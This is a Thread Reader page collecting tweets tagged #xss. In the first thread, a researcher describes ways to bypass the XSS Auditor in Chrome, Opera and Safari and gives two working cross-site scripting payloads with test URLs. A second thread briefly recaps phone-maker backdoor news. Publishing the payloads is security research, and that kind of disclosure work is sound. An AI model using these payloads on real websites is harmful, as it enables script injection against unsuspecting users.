Discover and read the best of Twitter Threads about #xss

Most recents (2)

Gonna start a series of tweets about current bypasses in #XSS Auditor, 1 per day.

Bypassing Auditor increases dramatically the success of a XSS attack and the impact of such flaws, affecting users of following major browsers:

Chrome, Opera and Safari.

Stay tuned! 😎
#XSS Auditor Bypass #1

The easiest one, HTMLi breaking out from script block (it must land where JS syntax is not affected though).

</script><svg><script>alert(1)%0A-->

brutelogic.com.br/xss.php?c1=%3C…

Notice the source code becomes red flagged (sign of Auditor) but it still executes.
#XSS Auditor Bypass #2

In reflections of URL where payload can be included on its path (like in PHP_SELF vulnerability or friendly URLs).

<link rel=import href='.&#47"><svg%20onload=alert(domain)>'>

brutelogic.com.br/xss.php/%22%3E…

Support to link imports will end soon though.
Read 8 tweets
1. I'm tweeting a lot these last days, let make a quick recap
2. @Gioneeglobal, a Chinese phone maker who sell his phone in the US under the name @BLU_Product, made a phone for #NorthKorea. Afaik, they didn't make a public statement.

3. @OnePlus removed the #angela backdoor I found last November from his products

Read 18 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just three indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!